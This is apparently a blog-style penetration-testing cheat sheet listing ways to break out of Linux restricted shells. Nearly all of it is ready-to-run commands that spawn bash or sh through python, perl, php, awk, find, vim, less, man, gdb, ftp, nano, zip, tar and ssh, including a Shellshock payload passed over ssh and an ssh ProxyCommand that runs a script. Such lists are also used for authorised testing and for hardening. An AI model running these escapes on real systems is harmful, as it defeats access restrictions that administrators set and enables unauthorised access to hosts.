---
title: Restricted Shell Escapes
author: Devin Cudnohufsky
date: 2020-08-10 00:00:00 +0500
categories: [Techniques]
tags: [bash, python, php, perl, ftp, gdb, man, more, less, vim, git, rvim, awk, find, nano, pico, zip, tar, ssh]
---

> Additional Resources: [GTFOBins](https://gtfobins.github.io/)

## Spawning

1. `/bin/bash -p`
1. `/bin/sh`

## Copy

1. `cp /bin/bash .`
    1. `/bin/bash -p`
1. `cp /bin/sh .`
    1. `/bin/sh`

## python

1. `python -c 'import os; os.system("/bin/bash")'`
1. `python -c 'import os; os.system("/bin/sh")'`

## php

1. `php -a`
    - `exec("bash -i");`
    - `exec("sh -i");`

## perl

1. `perl -e 'exec "/bin/bash";'`
1. `perl -e 'exec "/bin/sh";'`

## ftp

1. `ftp`
    - `!/bin/bash`
    - `!/bin/sh`

## gdb

1. `gdb`
    - `!/bin/bash`
    - `!/bin/sh`

## man

1. `man`
    - `!/bin/bash`
    - `!/bin/sh`

## more

1. `more`
    - `!/bin/bash`
    - `!/bin/sh`

## less

1. `less`
    - `!/bin/bash`
    - `!/bin/sh`

## vim

1. `vi`
    - `!/bin/bash`
    - `!/bin/sh`
1. `vim`
    - `!/bin/bash`
    - `!/bin/sh`

## git

1. `git help status`
    - `!/bin/bash`
    - `!/bin/sh`

## rvim

1. `rvim`
    - `python import os; os.system("/bin/bash")`
    - `python import os; os.system("/bin/sh")`

## awk

1. `awk 'BEGIN {system("/bin/bash")}'`
1. `awk 'BEGIN {system("/bin/sh")}'`

## find

1. `find / -name test -exec /bin/bash \;`
1. `find / -name test -exec /bin/sh \;`

## nano

1. `nano -s "/bin/bash"`
    1. Type out "/bin/bash"
    1. Run Spell Check (^t)

## pico

1. `pico -s "/bin/bash"`
    1. Type out "/bin/bash"
    1. Run Spell Check (^t)

## zip

1. `zip <zip>.zip <aFile> -T --unzip-command="sh -c /bin/bash"`

## tar

1. `tar cf /dev/null <aFile> --checkpoint=1 --checkpoint-action=exec=/bin/bash`

## SSH 

1. `ssh <username>@<ip> -t "/bin/bash"`
1. `ssh <username>@<ip> -t "/bin/sh"`
1. `ssh <username>@<ip> -t "bash --noprofile"`
1. `ssh <username>@<ip> -t "() { :;}; /bin/bash"` #ShellShock
1. `ssh -o ProxyCommand="sh -c /tmp/<file>.sh"`

> Source: [https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf](https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf)
